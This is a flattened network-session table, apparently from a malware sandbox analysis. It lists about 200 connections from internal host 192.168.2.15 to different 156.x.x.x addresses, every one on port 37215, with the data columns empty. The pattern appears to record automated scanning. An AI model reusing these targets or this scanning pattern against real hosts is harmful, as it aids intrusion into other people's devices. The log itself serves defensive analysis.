                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29604192.168.2.1539568156.241.42.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29605192.168.2.1545052156.248.157.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29606192.168.2.1547090156.82.178.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29607192.168.2.1535848156.216.235.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29608192.168.2.1542018156.15.238.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29609192.168.2.1560362156.220.201.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29610192.168.2.1548210156.26.236.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29611192.168.2.1552058156.63.68.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29612192.168.2.1546294156.20.11.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29613192.168.2.1556082156.10.181.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29614192.168.2.1551422156.86.161.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29615192.168.2.1539974156.23.202.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29616192.168.2.1545876156.119.194.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29617192.168.2.1541070156.142.250.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29618192.168.2.1553936156.114.222.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29619192.168.2.1551304156.190.254.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29620192.168.2.1543702156.239.97.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29621192.168.2.1540194156.176.45.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29622192.168.2.1537958156.20.46.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29623192.168.2.1557830156.197.161.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29624192.168.2.1538586156.229.1.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29625192.168.2.1541482156.205.65.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29626192.168.2.1534282156.93.31.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29627192.168.2.1545094156.78.100.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29628192.168.2.1548982156.162.219.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29629192.168.2.1537220156.176.121.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29630192.168.2.1537710156.216.45.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29631192.168.2.1540550156.151.184.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29632192.168.2.1538002156.41.98.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29633192.168.2.1537128156.177.218.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29634192.168.2.1554860156.111.215.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29635192.168.2.1546970156.107.108.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29636192.168.2.1538558156.20.159.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29637192.168.2.1542694156.4.23.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29638192.168.2.1546000156.36.93.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29639192.168.2.1545814156.127.235.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29640192.168.2.1538796156.63.78.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29641192.168.2.1547652156.24.240.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29642192.168.2.1555272156.83.21.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29643192.168.2.1560472156.164.5.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29644192.168.2.1537204156.3.11.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29645192.168.2.1539240156.67.143.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29646192.168.2.1554612156.174.200.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29647192.168.2.1536688156.4.12.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29648192.168.2.1552596156.32.157.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29649192.168.2.1548800156.228.222.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29650192.168.2.1533334156.65.117.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29651192.168.2.1538100156.195.69.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29652192.168.2.1544876156.53.71.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29653192.168.2.1557934156.37.115.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29654192.168.2.1543656156.119.38.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29655192.168.2.1546718156.181.19.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29656192.168.2.1557720156.243.91.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29657192.168.2.1544806156.11.76.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29658192.168.2.1533614156.127.95.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29659192.168.2.1541174156.223.24.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29660192.168.2.1559646156.210.31.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29661192.168.2.1544946156.18.35.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29662192.168.2.1551870156.34.29.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29663192.168.2.1549902156.157.178.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29664192.168.2.1543878156.30.157.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29665192.168.2.1553804156.54.22.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29666192.168.2.1554002156.116.235.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29667192.168.2.1551928156.95.6.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29668192.168.2.1537798156.1.79.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29669192.168.2.1540348156.10.255.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29670192.168.2.1548160156.56.236.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29671192.168.2.1558990156.85.159.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29672192.168.2.1550778156.35.231.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29673192.168.2.1540814156.118.244.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29674192.168.2.1536294156.37.73.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29675192.168.2.1546496156.211.125.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29676192.168.2.1555670156.154.107.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29677192.168.2.1558376156.137.51.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29678192.168.2.1533778156.100.198.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29679192.168.2.1541688156.222.85.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29680192.168.2.1556384156.67.247.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29681192.168.2.1558124156.85.35.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29682192.168.2.1546088156.239.32.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29683192.168.2.1539438156.232.88.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29684192.168.2.1544956156.215.195.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29685192.168.2.1536202156.218.186.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29686192.168.2.1544890156.160.176.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29687192.168.2.1544946156.97.105.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29688192.168.2.1534984156.179.22.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29689192.168.2.1536096156.210.23.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29690192.168.2.1559086156.79.39.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29691192.168.2.1547682156.130.44.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29692192.168.2.1542748156.249.102.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29693192.168.2.1551282156.156.145.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29694192.168.2.1560234156.24.34.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29695192.168.2.1559580156.22.146.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29696192.168.2.1557420156.31.54.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29697192.168.2.1553428156.235.60.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29698192.168.2.1541908156.12.169.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29699192.168.2.1533460156.70.143.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29700192.168.2.1537652156.151.127.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29701192.168.2.1532876156.151.118.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29702192.168.2.1534562156.95.30.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29703192.168.2.1550186156.36.9.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29704192.168.2.1557746156.163.3.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29705192.168.2.1542464156.171.247.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29706192.168.2.1559422156.162.199.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29707192.168.2.1534448156.5.160.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29708192.168.2.1556922156.213.127.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29709192.168.2.1537846156.239.69.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29710192.168.2.1553730156.171.99.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29711192.168.2.1546368156.85.117.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29712192.168.2.1552788156.165.107.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29713192.168.2.1549090156.84.186.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29714192.168.2.1556644156.20.35.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29715192.168.2.1551268156.116.109.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29716192.168.2.1539356156.214.132.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29717192.168.2.1548938156.125.222.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29718192.168.2.1547510156.9.21.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29719192.168.2.1543188156.177.44.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29720192.168.2.1560352156.167.94.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29721192.168.2.1540792156.21.108.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29722192.168.2.1535576156.38.231.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29723192.168.2.1548202156.53.110.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29724192.168.2.1550304156.155.220.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29725192.168.2.1533228156.42.54.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29726192.168.2.1545046156.109.175.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29727192.168.2.1557334156.136.128.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29728192.168.2.1541350156.92.79.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29729192.168.2.1544874156.239.128.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29730192.168.2.1543892156.28.247.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29731192.168.2.1560094156.96.39.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29732192.168.2.1556924156.49.83.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29733192.168.2.1554886156.161.206.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29734192.168.2.1557418156.85.210.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29735192.168.2.1539652156.39.213.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29736192.168.2.1558358156.217.172.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29737192.168.2.1537698156.225.96.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29738192.168.2.1544562156.126.233.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29739192.168.2.1536542156.131.122.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29740192.168.2.1558042156.14.19.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29741192.168.2.1537372156.208.87.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29742192.168.2.1551372156.220.30.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29743192.168.2.1552014156.138.232.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29744192.168.2.1543414156.215.219.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29745192.168.2.1534676156.210.16.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29746192.168.2.1542092156.184.173.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29747192.168.2.1542332156.211.244.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29748192.168.2.1547592156.208.53.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29749192.168.2.1549280156.3.82.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29750192.168.2.1544320156.209.231.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29751192.168.2.1547748156.62.242.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29752192.168.2.1550844156.232.68.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29753192.168.2.1540160156.83.102.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29754192.168.2.1548392156.170.220.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29755192.168.2.1538076156.93.104.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29756192.168.2.1549944156.75.191.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29757192.168.2.1555994156.8.103.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29758192.168.2.1544346156.20.37.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29759192.168.2.1540590156.95.139.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29760192.168.2.1542752156.208.40.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29761192.168.2.1541932156.254.8.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29762192.168.2.1556738156.164.151.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29763192.168.2.1548680156.10.31.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29764192.168.2.1540692156.154.125.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29765192.168.2.1560882156.170.5.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29766192.168.2.1548216156.243.64.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29767192.168.2.1535824156.30.130.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29768192.168.2.1552062156.92.143.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29769192.168.2.1533216156.34.180.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29770192.168.2.1544562156.49.119.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29771192.168.2.1537056156.148.95.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29772192.168.2.1544238156.174.49.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29773192.168.2.1544292156.46.247.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29774192.168.2.1543660156.193.110.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29775192.168.2.1558568156.98.84.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29776192.168.2.1533324156.230.75.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29777192.168.2.1560764156.221.243.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29778192.168.2.1537934156.199.207.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29779192.168.2.1545384156.84.84.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29780192.168.2.1548694156.171.204.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29781192.168.2.1555660156.20.80.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29782192.168.2.1541256156.103.86.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29783192.168.2.1541584156.149.245.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29784192.168.2.1552114156.60.88.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29785192.168.2.1550902156.44.123.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29786192.168.2.1537522156.37.174.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29787192.168.2.1533038156.197.102.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29788192.168.2.1549966156.161.192.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29789192.168.2.1548414156.120.161.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29790192.168.2.1557728156.101.52.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29791192.168.2.1552884156.168.155.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29792192.168.2.1551006156.124.122.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29793192.168.2.1551070156.147.34.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29794192.168.2.1544968156.156.0.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29795192.168.2.1556310156.94.152.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29796192.168.2.1552394156.46.228.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29797192.168.2.1538090156.203.155.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29798192.168.2.1552680156.40.233.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29799192.168.2.1534108156.9.239.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29800192.168.2.1552182156.61.48.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29801192.168.2.1544692156.144.36.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29802192.168.2.1543454156.38.172.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29803192.168.2.1547228156.91.181.22137215
